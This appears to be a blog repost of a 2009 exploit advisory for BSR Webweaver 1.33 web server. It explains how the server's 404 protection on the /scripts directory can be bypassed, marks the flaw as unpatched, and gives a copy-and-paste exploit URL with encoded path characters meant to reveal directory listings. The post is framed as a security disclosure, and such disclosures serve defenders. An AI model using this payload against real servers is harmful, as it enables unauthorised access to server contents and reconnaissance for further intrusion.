BSR Webweaver 1.33 /script security Bypass vulnerability

BSR Webweaver 1.33

Author : Usman Saeed , Exploit @ Xc0re Security Research Group.

[*] Date: 15/09/09

[*] http://www.brswebweaver.com/downloads.html

[*] Attack type : Remote

[*] Patch Status : Unpatched

[*] Description : In ISAPI/CGI path is [%installdirectory%/scripts] and through HTTP the alias is [http://[host]/scripts] ,The access security check is that if the attacker tries to access /scripts a 404 Error response occurs ! Now to bypass and check the directory listing [That is if Directory Browsing is allowed in the server Configuration !] just copy and paste the exploit url !.
This is the reason this exploit is not called a Directory Listing Exploit !

[*] Exploitation :

[+] http://%5Bhost%5D/scripts/%bg%ae%bg%ae/.exe

Advertisements

About 0x90

Infosec professional View all posts by 0x90

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: